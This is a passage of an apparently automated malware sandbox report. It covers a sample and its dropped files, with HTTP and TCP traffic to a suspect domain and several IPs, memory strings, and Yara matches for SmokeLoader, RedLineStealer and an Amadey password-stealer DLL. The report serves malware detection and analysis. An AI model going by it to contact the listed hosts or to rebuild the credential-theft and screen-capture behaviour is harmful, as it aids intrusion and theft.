75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:56 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 47Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb b8 4c 03 42 ba cd ec a4 f8 48 1d e8 9e 79 a7 a2 52 3c 84 f9 87 bb 23 b7 82 91 ae 23 a4 5b 9b Data Ascii: %S`Nh&WQLBHyR<##[
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 13 Dec 2022 19:08:58 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 23.35.237.194
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknown TCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknown TCP traffic detected without corresponding DNS query: 2.20.195.105
Source: unknown TCP traffic detected without corresponding DNS query: 2.20.195.105
Source: unknown TCP traffic detected without corresponding DNS query: 2.20.195.105
Source: unknown TCP traffic detected without corresponding DNS query: 8.238.85.254
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknown TCP traffic detected without corresponding DNS query: 8.238.88.254
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknown TCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 8.238.88.254
Source: unknown TCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.228
Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Referer: %SHost: %shttp://yandex.ru/yandsearchhttp://www.google.com/searchhttp://go.mail.ru/searchhttp://nova.rambler.ru/searchhttp://search.aol.com/aol/searchhttp://search.yahoo.com/search; WOW64; Win64; x64; Trident/7.0; rv:11.0) like Gecko; rv:58.0) Gecko/20100101 Firefox/58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Mozilla/5.0 (Windows NT %d.%d%s%s/<ahref"' >%s%s%shttp:,FFddos_rules=|:|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoConnection: close equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Referer: %SHost: %shttp://yandex.ru/yandsearchhttp://www.google.com/searchhttp://go.mail.ru/searchhttp://nova.rambler.ru/searchhttp://search.aol.com/aol/searchhttp://search.yahoo.com/search; WOW64; Win64; x64; Trident/7.0; rv:11.0) like Gecko; rv:58.0) Gecko/20100101 Firefox/58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Mozilla/5.0 (Windows NT %d.%d%s%s/<ahref"' >%s%s%shttp:,FFddos_rules=|:|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoConnection: close equals www.yahoo.com (Yahoo)
Source: unknown HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
Source: unknown HTTPS traffic detected: 23.35.236.109:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.98.131.207:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.159.19:443 -> 192.168.2.3:49728 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000013.00000002.775997702.0000000000521000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.774640150.00000000006B1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match File source: 43.3.thgcici.490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.thgcici.6a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.thgcici.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kmxId0uLRn.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.kmxId0uLRn.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kmxId0uLRn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.thgcici.2090000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 43.2.thgcici.470e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 43.2.thgcici.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002B.00000003.588957160.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.263185446.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.425062940.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DD2DA0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown, 14_2_00DD2DA0
Creates a DirectInput object (often for capturing keystrokes)
Source: 9545.exe, 0000000E.00000002.419598759.00000000013DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.456935359.00000000006C1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.456463598.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001A.00000000.423609338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000002B.00000002.603006628.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000002B.00000002.603522638.00000000004A4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.354530381.0000000000631000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.354314042.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED Matched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, type: DROPPED Matched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 268
Detected potential crypto function
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_0040D008 0_2_0040D008
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_00409C20 0_2_00409C20
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_0040CAC4 0_2_0040CAC4
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_0040F7FC 0_2_0040F7FC
Source: C:\Users\user\Desktop\kmxId0uLRn.exe Code function: 0_2_0040C580 0_2_0040C580
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_0040D008 11_2_0040D008
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_00409C20 11_2_00409C20
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_0040CAC4 11_2_0040CAC4
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_0040F7FC 11_2_0040F7FC
Source: C:\Users\user\AppData\Roaming\thgcici Code function: 11_2_0040C580 11_2_0040C580
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C120E0 12_2_00C120E0
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C1C3DB 12_2_00C1C3DB
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C2E32A 12_2_00C2E32A
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C12550 12_2_00C12550
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C28509 12_2_00C28509
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C2C8AE 12_2_00C2C8AE
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C1F960 12_2_00C1F960
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C3090C 12_2_00C3090C
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C30A2C 12_2_00C30A2C
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C24BEE 12_2_00C24BEE
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DF8C7D 14_2_00DF8C7D
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DF9C60 14_2_00DF9C60
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DD77C0 14_2_00DD77C0
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: capabilityaccessmanagerclient.dll Jump to behavior
Uses 32bit PE files
Source: kmxId0uLRn.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.456935359.00000000006C1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.456463598.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001A.00000000.423609338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000002B.00000002.603006628.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000002B.00000002.603522638.00000000004A4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.354530381.0000000000631000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.354314042.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
